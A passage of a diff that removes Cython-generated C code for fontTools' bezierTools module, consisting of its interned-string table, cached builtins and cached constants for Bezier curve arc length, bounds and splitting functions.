__pyx_k_pt2y, sizeof(__pyx_k_pt2y), 0, 0, 1, 1}, - {&__pyx_n_s_pt3, __pyx_k_pt3, sizeof(__pyx_k_pt3), 0, 0, 1, 1}, - {&__pyx_n_s_pt4, __pyx_k_pt4, sizeof(__pyx_k_pt4), 0, 0, 1, 1}, - {&__pyx_n_s_px, __pyx_k_px, sizeof(__pyx_k_px), 0, 0, 1, 1}, - {&__pyx_n_s_py, __pyx_k_py, sizeof(__pyx_k_py), 0, 0, 1, 1}, - {&__pyx_n_s_quadraticPointAtT, __pyx_k_quadraticPointAtT, sizeof(__pyx_k_quadraticPointAtT), 0, 0, 1, 1}, - {&__pyx_n_u_quadraticPointAtT, __pyx_k_quadraticPointAtT, sizeof(__pyx_k_quadraticPointAtT), 0, 1, 0, 1}, - {&__pyx_n_s_r, __pyx_k_r, sizeof(__pyx_k_r), 
0, 0, 1, 1}, - {&__pyx_n_s_rDD, __pyx_k_rDD, sizeof(__pyx_k_rDD), 0, 0, 1, 1}, - {&__pyx_n_s_rQ2, __pyx_k_rQ2, sizeof(__pyx_k_rQ2), 0, 0, 1, 1}, - {&__pyx_n_s_range, __pyx_k_range, sizeof(__pyx_k_range), 0, 0, 1, 1}, - {&__pyx_n_s_range1, __pyx_k_range1, sizeof(__pyx_k_range1), 0, 0, 1, 1}, - {&__pyx_n_s_range2, __pyx_k_range2, sizeof(__pyx_k_range2), 0, 0, 1, 1}, - {&__pyx_n_s_rectArea, __pyx_k_rectArea, sizeof(__pyx_k_rectArea), 0, 0, 1, 1}, - {&__pyx_n_s_roots, __pyx_k_roots, sizeof(__pyx_k_roots), 0, 0, 1, 1}, - {&__pyx_n_s_rotate, __pyx_k_rotate, sizeof(__pyx_k_rotate), 0, 0, 1, 1}, - {&__pyx_n_s_round, __pyx_k_round, sizeof(__pyx_k_round), 0, 0, 1, 1}, - {&__pyx_n_s_s, __pyx_k_s, sizeof(__pyx_k_s), 0, 0, 1, 1}, - {&__pyx_n_s_s1, __pyx_k_s1, sizeof(__pyx_k_s1), 0, 0, 1, 1}, - {&__pyx_n_s_s1x, __pyx_k_s1x, sizeof(__pyx_k_s1x), 0, 0, 1, 1}, - {&__pyx_n_s_s1y, __pyx_k_s1y, sizeof(__pyx_k_s1y), 0, 0, 1, 1}, - {&__pyx_n_s_s2, __pyx_k_s2, sizeof(__pyx_k_s2), 0, 0, 1, 1}, - {&__pyx_n_s_s2x, __pyx_k_s2x, sizeof(__pyx_k_s2x), 0, 0, 1, 1}, - {&__pyx_n_s_s2y, __pyx_k_s2y, sizeof(__pyx_k_s2y), 0, 0, 1, 1}, - {&__pyx_kp_u_s_2, __pyx_k_s_2, sizeof(__pyx_k_s_2), 0, 1, 0, 0}, - {&__pyx_n_s_scale, __pyx_k_scale, sizeof(__pyx_k_scale), 0, 0, 1, 1}, - {&__pyx_n_s_sectRect, __pyx_k_sectRect, sizeof(__pyx_k_sectRect), 0, 0, 1, 1}, - {&__pyx_n_s_seen, __pyx_k_seen, sizeof(__pyx_k_seen), 0, 0, 1, 1}, - {&__pyx_n_s_seg, __pyx_k_seg, sizeof(__pyx_k_seg), 0, 0, 1, 1}, - {&__pyx_n_s_seg1, __pyx_k_seg1, sizeof(__pyx_k_seg1), 0, 0, 1, 1}, - {&__pyx_n_s_seg2, __pyx_k_seg2, sizeof(__pyx_k_seg2), 0, 0, 1, 1}, - {&__pyx_n_s_segment, __pyx_k_segment, sizeof(__pyx_k_segment), 0, 0, 1, 1}, - {&__pyx_n_s_segmentPointAtT, __pyx_k_segmentPointAtT, sizeof(__pyx_k_segmentPointAtT), 0, 0, 1, 1}, - {&__pyx_n_u_segmentPointAtT, __pyx_k_segmentPointAtT, sizeof(__pyx_k_segmentPointAtT), 0, 1, 0, 1}, - {&__pyx_n_s_segmentSegmentIntersections, __pyx_k_segmentSegmentIntersections, 
sizeof(__pyx_k_segmentSegmentIntersections), 0, 0, 1, 1}, - {&__pyx_n_u_segmentSegmentIntersections, __pyx_k_segmentSegmentIntersections, sizeof(__pyx_k_segmentSegmentIntersections), 0, 1, 0, 1}, - {&__pyx_kp_u_segmentSegmentIntersections_line, __pyx_k_segmentSegmentIntersections_line, sizeof(__pyx_k_segmentSegmentIntersections_line), 0, 1, 0, 0}, - {&__pyx_n_s_segmentrepr, __pyx_k_segmentrepr, sizeof(__pyx_k_segmentrepr), 0, 0, 1, 1}, - {&__pyx_kp_u_segmentrepr_1_2_3_2_3_4_0_1_2, __pyx_k_segmentrepr_1_2_3_2_3_4_0_1_2, sizeof(__pyx_k_segmentrepr_1_2_3_2_3_4_0_1_2), 0, 1, 0, 0}, - {&__pyx_kp_u_segmentrepr_line_1449, __pyx_k_segmentrepr_line_1449, sizeof(__pyx_k_segmentrepr_line_1449), 0, 1, 0, 0}, - {&__pyx_n_s_segmentrepr_locals_genexpr, __pyx_k_segmentrepr_locals_genexpr, sizeof(__pyx_k_segmentrepr_locals_genexpr), 0, 0, 1, 1}, - {&__pyx_n_s_segments, __pyx_k_segments, sizeof(__pyx_k_segments), 0, 0, 1, 1}, - {&__pyx_n_s_send, __pyx_k_send, sizeof(__pyx_k_send), 0, 0, 1, 1}, - {&__pyx_n_s_slope12, __pyx_k_slope12, sizeof(__pyx_k_slope12), 0, 0, 1, 1}, - {&__pyx_n_s_slope34, __pyx_k_slope34, sizeof(__pyx_k_slope34), 0, 0, 1, 1}, - {&__pyx_n_s_solutions, __pyx_k_solutions, sizeof(__pyx_k_solutions), 0, 0, 1, 1}, - {&__pyx_n_s_solveCubic, __pyx_k_solveCubic, sizeof(__pyx_k_solveCubic), 0, 0, 1, 1}, - {&__pyx_n_u_solveCubic, __pyx_k_solveCubic, sizeof(__pyx_k_solveCubic), 0, 1, 0, 1}, - {&__pyx_kp_u_solveCubic_line_841, __pyx_k_solveCubic_line_841, sizeof(__pyx_k_solveCubic_line_841), 0, 1, 0, 0}, - {&__pyx_n_s_solveQuadratic, __pyx_k_solveQuadratic, sizeof(__pyx_k_solveQuadratic), 0, 0, 1, 1}, - {&__pyx_n_u_solveQuadratic, __pyx_k_solveQuadratic, sizeof(__pyx_k_solveQuadratic), 0, 1, 0, 1}, - {&__pyx_n_s_spec, __pyx_k_spec, sizeof(__pyx_k_spec), 0, 0, 1, 1}, - {&__pyx_n_s_splitCubic, __pyx_k_splitCubic, sizeof(__pyx_k_splitCubic), 0, 0, 1, 1}, - {&__pyx_n_u_splitCubic, __pyx_k_splitCubic, sizeof(__pyx_k_splitCubic), 0, 1, 0, 1}, - {&__pyx_n_s_splitCubicAtT, 
__pyx_k_splitCubicAtT, sizeof(__pyx_k_splitCubicAtT), 0, 0, 1, 1}, - {&__pyx_n_s_splitCubicAtTC, __pyx_k_splitCubicAtTC, sizeof(__pyx_k_splitCubicAtTC), 0, 0, 1, 1}, - {&__pyx_n_u_splitCubicAtTC, __pyx_k_splitCubicAtTC, sizeof(__pyx_k_splitCubicAtTC), 0, 1, 0, 1}, - {&__pyx_n_s_splitCubicAtTC_2, __pyx_k_splitCubicAtTC_2, sizeof(__pyx_k_splitCubicAtTC_2), 0, 0, 1, 1}, - {&__pyx_n_s_splitCubicAtT_2, __pyx_k_splitCubicAtT_2, sizeof(__pyx_k_splitCubicAtT_2), 0, 0, 1, 1}, - {&__pyx_n_u_splitCubicAtT_2, __pyx_k_splitCubicAtT_2, sizeof(__pyx_k_splitCubicAtT_2), 0, 1, 0, 1}, - {&__pyx_kp_u_splitCubicAtT_line_613, __pyx_k_splitCubicAtT_line_613, sizeof(__pyx_k_splitCubicAtT_line_613), 0, 1, 0, 0}, - {&__pyx_n_s_splitCubicIntoTwoAtTC, __pyx_k_splitCubicIntoTwoAtTC, sizeof(__pyx_k_splitCubicIntoTwoAtTC), 0, 0, 1, 1}, - {&__pyx_n_u_splitCubicIntoTwoAtTC, __pyx_k_splitCubicIntoTwoAtTC, sizeof(__pyx_k_splitCubicIntoTwoAtTC), 0, 1, 0, 1}, - {&__pyx_kp_u_splitCubic_line_552, __pyx_k_splitCubic_line_552, sizeof(__pyx_k_splitCubic_line_552), 0, 1, 0, 0}, - {&__pyx_n_s_splitCubic_locals_genexpr, __pyx_k_splitCubic_locals_genexpr, sizeof(__pyx_k_splitCubic_locals_genexpr), 0, 0, 1, 1}, - {&__pyx_n_s_splitLine, __pyx_k_splitLine, sizeof(__pyx_k_splitLine), 0, 0, 1, 1}, - {&__pyx_n_u_splitLine, __pyx_k_splitLine, sizeof(__pyx_k_splitLine), 0, 1, 0, 1}, - {&__pyx_kp_u_splitLine_line_450, __pyx_k_splitLine_line_450, sizeof(__pyx_k_splitLine_line_450), 0, 1, 0, 0}, - {&__pyx_n_s_splitQuadratic, __pyx_k_splitQuadratic, sizeof(__pyx_k_splitQuadratic), 0, 0, 1, 1}, - {&__pyx_n_u_splitQuadratic, __pyx_k_splitQuadratic, sizeof(__pyx_k_splitQuadratic), 0, 1, 0, 1}, - {&__pyx_n_s_splitQuadraticAtT, __pyx_k_splitQuadraticAtT, sizeof(__pyx_k_splitQuadraticAtT), 0, 0, 1, 1}, - {&__pyx_n_s_splitQuadraticAtT_2, __pyx_k_splitQuadraticAtT_2, sizeof(__pyx_k_splitQuadraticAtT_2), 0, 0, 1, 1}, - {&__pyx_n_u_splitQuadraticAtT_2, __pyx_k_splitQuadraticAtT_2, sizeof(__pyx_k_splitQuadraticAtT_2), 0, 1, 0, 1}, 
- {&__pyx_kp_u_splitQuadraticAtT_line_589, __pyx_k_splitQuadraticAtT_line_589, sizeof(__pyx_k_splitQuadraticAtT_line_589), 0, 1, 0, 0}, - {&__pyx_kp_u_splitQuadratic_line_507, __pyx_k_splitQuadratic_line_507, sizeof(__pyx_k_splitQuadratic_line_507), 0, 1, 0, 0}, - {&__pyx_n_s_splitQuadratic_locals_genexpr, __pyx_k_splitQuadratic_locals_genexpr, sizeof(__pyx_k_splitQuadratic_locals_genexpr), 0, 0, 1, 1}, - {&__pyx_n_s_split_cubic_into_two, __pyx_k_split_cubic_into_two, sizeof(__pyx_k_split_cubic_into_two), 0, 0, 1, 1}, - {&__pyx_n_s_split_segment_at_t, __pyx_k_split_segment_at_t, sizeof(__pyx_k_split_segment_at_t), 0, 0, 1, 1}, - {&__pyx_n_s_sqrt, __pyx_k_sqrt, sizeof(__pyx_k_sqrt), 0, 0, 1, 1}, - {&__pyx_n_s_start, __pyx_k_start, sizeof(__pyx_k_start), 0, 0, 1, 1}, - {&__pyx_n_s_swapped, __pyx_k_swapped, sizeof(__pyx_k_swapped), 0, 0, 1, 1}, - {&__pyx_n_s_sx, __pyx_k_sx, sizeof(__pyx_k_sx), 0, 0, 1, 1}, - {&__pyx_n_s_sy, __pyx_k_sy, sizeof(__pyx_k_sy), 0, 0, 1, 1}, - {&__pyx_n_s_sys, __pyx_k_sys, sizeof(__pyx_k_sys), 0, 0, 1, 1}, - {&__pyx_n_s_t, __pyx_k_t, sizeof(__pyx_k_t), 0, 0, 1, 1}, - {&__pyx_n_s_t1, __pyx_k_t1, sizeof(__pyx_k_t1), 0, 0, 1, 1}, - {&__pyx_n_u_t1, __pyx_k_t1, sizeof(__pyx_k_t1), 0, 1, 0, 1}, - {&__pyx_n_s_t1_2, __pyx_k_t1_2, sizeof(__pyx_k_t1_2), 0, 0, 1, 1}, - {&__pyx_n_s_t1_3, __pyx_k_t1_3, sizeof(__pyx_k_t1_3), 0, 0, 1, 1}, - {&__pyx_n_s_t2, __pyx_k_t2, sizeof(__pyx_k_t2), 0, 0, 1, 1}, - {&__pyx_n_u_t2, __pyx_k_t2, sizeof(__pyx_k_t2), 0, 1, 0, 1}, - {&__pyx_n_s_test, __pyx_k_test, sizeof(__pyx_k_test), 0, 0, 1, 1}, - {&__pyx_n_s_testmod, __pyx_k_testmod, sizeof(__pyx_k_testmod), 0, 0, 1, 1}, - {&__pyx_n_s_theta, __pyx_k_theta, sizeof(__pyx_k_theta), 0, 0, 1, 1}, - {&__pyx_n_s_throw, __pyx_k_throw, sizeof(__pyx_k_throw), 0, 0, 1, 1}, - {&__pyx_n_s_tolerance, __pyx_k_tolerance, sizeof(__pyx_k_tolerance), 0, 0, 1, 1}, - {&__pyx_n_s_transformPoints, __pyx_k_transformPoints, sizeof(__pyx_k_transformPoints), 0, 0, 1, 1}, - {&__pyx_n_s_translate, 
__pyx_k_translate, sizeof(__pyx_k_translate), 0, 0, 1, 1}, - {&__pyx_n_s_ts, __pyx_k_ts, sizeof(__pyx_k_ts), 0, 0, 1, 1}, - {&__pyx_n_s_two, __pyx_k_two, sizeof(__pyx_k_two), 0, 0, 1, 1}, - {&__pyx_n_s_unique_key, __pyx_k_unique_key, sizeof(__pyx_k_unique_key), 0, 0, 1, 1}, - {&__pyx_n_s_unique_values, __pyx_k_unique_values, sizeof(__pyx_k_unique_values), 0, 0, 1, 1}, - {&__pyx_n_s_v0, __pyx_k_v0, sizeof(__pyx_k_v0), 0, 0, 1, 1}, - {&__pyx_n_s_v1, __pyx_k_v1, sizeof(__pyx_k_v1), 0, 0, 1, 1}, - {&__pyx_n_s_v2, __pyx_k_v2, sizeof(__pyx_k_v2), 0, 0, 1, 1}, - {&__pyx_n_s_v3, __pyx_k_v3, sizeof(__pyx_k_v3), 0, 0, 1, 1}, - {&__pyx_n_s_v4, __pyx_k_v4, sizeof(__pyx_k_v4), 0, 0, 1, 1}, - {&__pyx_n_s_where, __pyx_k_where, sizeof(__pyx_k_where), 0, 0, 1, 1}, - {&__pyx_n_s_x, __pyx_k_x, sizeof(__pyx_k_x), 0, 0, 1, 1}, - {&__pyx_n_s_x0, __pyx_k_x0, sizeof(__pyx_k_x0), 0, 0, 1, 1}, - {&__pyx_n_s_x1, __pyx_k_x1, sizeof(__pyx_k_x1), 0, 0, 1, 1}, - {&__pyx_n_s_x2, __pyx_k_x2, sizeof(__pyx_k_x2), 0, 0, 1, 1}, - {&__pyx_n_s_x3, __pyx_k_x3, sizeof(__pyx_k_x3), 0, 0, 1, 1}, - {&__pyx_n_s_x4, __pyx_k_x4, sizeof(__pyx_k_x4), 0, 0, 1, 1}, - {&__pyx_n_s_xDiff, __pyx_k_xDiff, sizeof(__pyx_k_xDiff), 0, 0, 1, 1}, - {&__pyx_n_s_xRoots, __pyx_k_xRoots, sizeof(__pyx_k_xRoots), 0, 0, 1, 1}, - {&__pyx_n_s_y, __pyx_k_y, sizeof(__pyx_k_y), 0, 0, 1, 1}, - {&__pyx_n_s_y1, __pyx_k_y1, sizeof(__pyx_k_y1), 0, 0, 1, 1}, - {&__pyx_n_s_y2, __pyx_k_y2, sizeof(__pyx_k_y2), 0, 0, 1, 1}, - {&__pyx_n_s_y3, __pyx_k_y3, sizeof(__pyx_k_y3), 0, 0, 1, 1}, - {&__pyx_n_s_y4, __pyx_k_y4, sizeof(__pyx_k_y4), 0, 0, 1, 1}, - {&__pyx_n_s_yDiff, __pyx_k_yDiff, sizeof(__pyx_k_yDiff), 0, 0, 1, 1}, - {&__pyx_n_s_yRoots, __pyx_k_yRoots, sizeof(__pyx_k_yRoots), 0, 0, 1, 1}, - {0, 0, 0, 0, 0, 0, 0} - }; - return __Pyx_InitStrings(__pyx_string_tab); -} -/* #### Code section: cached_builtins ### */ -static CYTHON_SMALL_CODE int __Pyx_InitCachedBuiltins(void) { - __pyx_builtin_AttributeError = 
__Pyx_GetBuiltinName(__pyx_n_s_AttributeError); if (!__pyx_builtin_AttributeError) __PYX_ERR(0, 14, __pyx_L1_error) - __pyx_builtin_ImportError = __Pyx_GetBuiltinName(__pyx_n_s_ImportError); if (!__pyx_builtin_ImportError) __PYX_ERR(0, 14, __pyx_L1_error) - __pyx_builtin_range = __Pyx_GetBuiltinName(__pyx_n_s_range); if (!__pyx_builtin_range) __PYX_ERR(0, 709, __pyx_L1_error) - __pyx_builtin_round = __Pyx_GetBuiltinName(__pyx_n_s_round); if (!__pyx_builtin_round) __PYX_ERR(0, 899, __pyx_L1_error) - __pyx_builtin_ValueError = __Pyx_GetBuiltinName(__pyx_n_s_ValueError); if (!__pyx_builtin_ValueError) __PYX_ERR(0, 1119, __pyx_L1_error) - __pyx_builtin_TypeError = __Pyx_GetBuiltinName(__pyx_n_s_TypeError); if (!__pyx_builtin_TypeError) __PYX_ERR(0, 1456, __pyx_L1_error) - __pyx_builtin_print = __Pyx_GetBuiltinName(__pyx_n_s_print); if (!__pyx_builtin_print) __PYX_ERR(0, 1467, __pyx_L1_error) - return 0; - __pyx_L1_error:; - return -1; -} -/* #### Code section: cached_constants ### */ - -static CYTHON_SMALL_CODE int __Pyx_InitCachedConstants(void) { - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("__Pyx_InitCachedConstants", 0); - - /* "fontTools/misc/bezierTools.py":704 - * ts = list(ts) - * segments = [] - * ts.insert(0, 0.0) # <<<<<<<<<<<<<< - * ts.append(1.0) - * ax, ay = a - */ - __pyx_tuple__2 = PyTuple_Pack(2, __pyx_int_0, __pyx_float_0_0); if (unlikely(!__pyx_tuple__2)) __PYX_ERR(0, 704, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__2); - __Pyx_GIVEREF(__pyx_tuple__2); - - /* "fontTools/misc/bezierTools.py":1119 - * elif len(seg) == 4: - * return cubicPointAtT(*seg, t) - * raise ValueError("Unknown curve degree") # <<<<<<<<<<<<<< - * - * - */ - __pyx_tuple__4 = PyTuple_Pack(1, __pyx_kp_u_Unknown_curve_degree); if (unlikely(!__pyx_tuple__4)) __PYX_ERR(0, 1119, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__4); - __Pyx_GIVEREF(__pyx_tuple__4); - - /* "fontTools/misc/bezierTools.py":1313 - * - * if not range1: - * range1 = (0.0, 1.0) # <<<<<<<<<<<<<< - * if 
not range2: - * range2 = (0.0, 1.0) - */ - __pyx_tuple__5 = PyTuple_Pack(2, __pyx_float_0_0, __pyx_float_1_0); if (unlikely(!__pyx_tuple__5)) __PYX_ERR(0, 1313, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__5); - __Pyx_GIVEREF(__pyx_tuple__5); - - /* "fontTools/misc/bezierTools.py":1322 - * return [] - * - * def midpoint(r): # <<<<<<<<<<<<<< - * return 0.5 * (r[0] + r[1]) - * - */ - __pyx_tuple__6 = PyTuple_Pack(1, __pyx_n_s_r); if (unlikely(!__pyx_tuple__6)) __PYX_ERR(0, 1322, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__6); - __Pyx_GIVEREF(__pyx_tuple__6); - __pyx_codeobj__7 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__6, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_midpoint, 1322, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__7)) __PYX_ERR(0, 1322, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1443 - * intersections = lineLineIntersections(*seg1, *seg2) - * else: - * raise ValueError("Couldn't work out which intersection function to use") # <<<<<<<<<<<<<< - * if not swapped: - * return intersections - */ - __pyx_tuple__8 = PyTuple_Pack(1, __pyx_kp_u_Couldn_t_work_out_which_intersec); if (unlikely(!__pyx_tuple__8)) __PYX_ERR(0, 1443, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__8); - __Pyx_GIVEREF(__pyx_tuple__8); - - /* "fontTools/misc/bezierTools.py":56 - * - * - * def calcCubicArcLength(pt1, pt2, pt3, pt4, tolerance=0.005): # <<<<<<<<<<<<<< - * """Calculates the arc length for a cubic Bezier segment. 
- * - */ - __pyx_tuple__12 = PyTuple_Pack(5, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3, __pyx_n_s_pt4, __pyx_n_s_tolerance); if (unlikely(!__pyx_tuple__12)) __PYX_ERR(0, 56, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__12); - __Pyx_GIVEREF(__pyx_tuple__12); - __pyx_codeobj__13 = (PyObject*)__Pyx_PyCode_New(5, 0, 0, 5, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__12, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_calcCubicArcLength, 56, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__13)) __PYX_ERR(0, 56, __pyx_L1_error) - __pyx_tuple__14 = PyTuple_Pack(1, ((PyObject*)__pyx_float_0_005)); if (unlikely(!__pyx_tuple__14)) __PYX_ERR(0, 56, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__14); - __Pyx_GIVEREF(__pyx_tuple__14); - - /* "fontTools/misc/bezierTools.py":75 - * - * - * def _split_cubic_into_two(p0, p1, p2, p3): # <<<<<<<<<<<<<< - * mid = (p0 + 3 * (p1 + p2) + p3) * 0.125 - * deriv3 = (p3 + p2 - p1 - p0) * 0.125 - */ - __pyx_tuple__15 = PyTuple_Pack(6, __pyx_n_s_p0, __pyx_n_s_p1, __pyx_n_s_p2, __pyx_n_s_p3, __pyx_n_s_mid, __pyx_n_s_deriv3); if (unlikely(!__pyx_tuple__15)) __PYX_ERR(0, 75, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__15); - __Pyx_GIVEREF(__pyx_tuple__15); - __pyx_codeobj__16 = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 6, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__15, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_split_cubic_into_two, 75, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__16)) __PYX_ERR(0, 75, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":84 - * - * - * @cython.returns(cython.double) # <<<<<<<<<<<<<< - * @cython.locals( - * p0=cython.complex, - */ - __pyx_tuple__17 = PyTuple_Pack(9, __pyx_n_s_mult, __pyx_n_s_p0, __pyx_n_s_p1, __pyx_n_s_p2, __pyx_n_s_p3, __pyx_n_s_arch, __pyx_n_s_box, __pyx_n_s_one, __pyx_n_s_two); if 
(unlikely(!__pyx_tuple__17)) __PYX_ERR(0, 84, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__17); - __Pyx_GIVEREF(__pyx_tuple__17); - __pyx_codeobj__18 = (PyObject*)__Pyx_PyCode_New(5, 0, 0, 9, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__17, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_calcCubicArcLengthCRecurse, 84, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__18)) __PYX_ERR(0, 84, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":104 - * - * - * @cython.returns(cython.double) # <<<<<<<<<<<<<< - * @cython.locals( - * pt1=cython.complex, - */ - __pyx_tuple__19 = PyTuple_Pack(6, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3, __pyx_n_s_pt4, __pyx_n_s_tolerance, __pyx_n_s_mult); if (unlikely(!__pyx_tuple__19)) __PYX_ERR(0, 104, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__19); - __Pyx_GIVEREF(__pyx_tuple__19); - __pyx_codeobj__20 = (PyObject*)__Pyx_PyCode_New(5, 0, 0, 6, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__19, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_calcCubicArcLengthC, 104, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__20)) __PYX_ERR(0, 104, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":151 - * - * - * def calcQuadraticArcLength(pt1, pt2, pt3): # <<<<<<<<<<<<<< - * """Calculates the arc length for a quadratic Bezier segment. 
- * - */ - __pyx_tuple__21 = PyTuple_Pack(3, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3); if (unlikely(!__pyx_tuple__21)) __PYX_ERR(0, 151, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__21); - __Pyx_GIVEREF(__pyx_tuple__21); - __pyx_codeobj__22 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 3, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__21, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_calcQuadraticArcLength, 151, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__22)) __PYX_ERR(0, 151, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":186 - * - * - * @cython.returns(cython.double) # <<<<<<<<<<<<<< - * @cython.locals( - * pt1=cython.complex, - */ - __pyx_tuple__23 = PyTuple_Pack(14, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3, __pyx_n_s_scale, __pyx_n_s_origDist, __pyx_n_s_a, __pyx_n_s_b, __pyx_n_s_x0, __pyx_n_s_x1, __pyx_n_s_Len, __pyx_n_s_d0, __pyx_n_s_d1, __pyx_n_s_d, __pyx_n_s_n); if (unlikely(!__pyx_tuple__23)) __PYX_ERR(0, 186, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__23); - __Pyx_GIVEREF(__pyx_tuple__23); - __pyx_codeobj__24 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 14, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__23, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_calcQuadraticArcLengthC, 186, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__24)) __PYX_ERR(0, 186, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":237 - * - * - * def approximateQuadraticArcLength(pt1, pt2, pt3): # <<<<<<<<<<<<<< - * """Calculates the arc length for a quadratic Bezier segment. 
- * - */ - __pyx_codeobj__25 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 3, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__21, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_approximateQuadraticArcLength, 237, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__25)) __PYX_ERR(0, 237, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":254 - * - * - * @cython.returns(cython.double) # <<<<<<<<<<<<<< - * @cython.locals( - * pt1=cython.complex, - */ - __pyx_tuple__26 = PyTuple_Pack(6, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3, __pyx_n_s_v0, __pyx_n_s_v1, __pyx_n_s_v2); if (unlikely(!__pyx_tuple__26)) __PYX_ERR(0, 254, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__26); - __Pyx_GIVEREF(__pyx_tuple__26); - __pyx_codeobj__27 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 6, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__26, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_approximateQuadraticArcLengthC, 254, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__27)) __PYX_ERR(0, 254, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":298 - * - * - * def calcQuadraticBounds(pt1, pt2, pt3): # <<<<<<<<<<<<<< - * """Calculates the bounding rectangle for a quadratic Bezier segment. 
- * - */ - __pyx_tuple__28 = PyTuple_Pack(14, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3, __pyx_n_s_ax, __pyx_n_s_ay, __pyx_n_s_bx, __pyx_n_s_by, __pyx_n_s_cx, __pyx_n_s_cy, __pyx_n_s_ax2, __pyx_n_s_ay2, __pyx_n_s_roots, __pyx_n_s_points, __pyx_n_s_t); if (unlikely(!__pyx_tuple__28)) __PYX_ERR(0, 298, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__28); - __Pyx_GIVEREF(__pyx_tuple__28); - __pyx_codeobj__29 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 14, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__28, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_calcQuadraticBounds, 298, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__29)) __PYX_ERR(0, 298, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":332 - * - * - * def approximateCubicArcLength(pt1, pt2, pt3, pt4): # <<<<<<<<<<<<<< - * """Approximates the arc length for a cubic Bezier segment. - * - */ - __pyx_tuple__30 = PyTuple_Pack(4, __pyx_n_s_pt1, __pyx_n_s_pt2, 